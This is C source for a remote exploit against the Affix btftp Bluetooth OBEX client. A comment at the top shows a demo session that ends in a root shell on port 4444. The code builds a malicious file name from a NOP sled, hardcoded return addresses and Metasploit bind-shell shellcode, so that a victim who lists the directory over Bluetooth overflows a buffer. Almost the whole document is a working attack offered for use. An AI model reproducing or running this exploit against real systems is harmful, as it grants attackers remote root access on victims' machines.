/*

Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp>  open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb    6               uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
            Ï­¹¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0

----------------------

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found



*/

#include <stdio.h>
#include <strings.h>
main()
{
	FILE *malfile;

	/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */ 
	unsigned char scode[] = 
	"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99" 
	"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34" 
	"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d" 
	"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd" 
	"\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07" 
	"\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36" 
	"\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde"; 

	char buf[1024];
	memset(buf,'\0',sizeof(buf));
	memset(buf,'\x90',94);
	strcat(buf+94,"\x75\xfb\xff\xbf");
	strcat(buf+98,"\x75\xfb\xff\xbf");
	memset(buf+102,'\x90',40);
	strcat(buf+142,scode);

        if(!(malfile = fopen(buf,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        
	fprintf(malfile, "pwned\n" );
        fclose(malfile);

}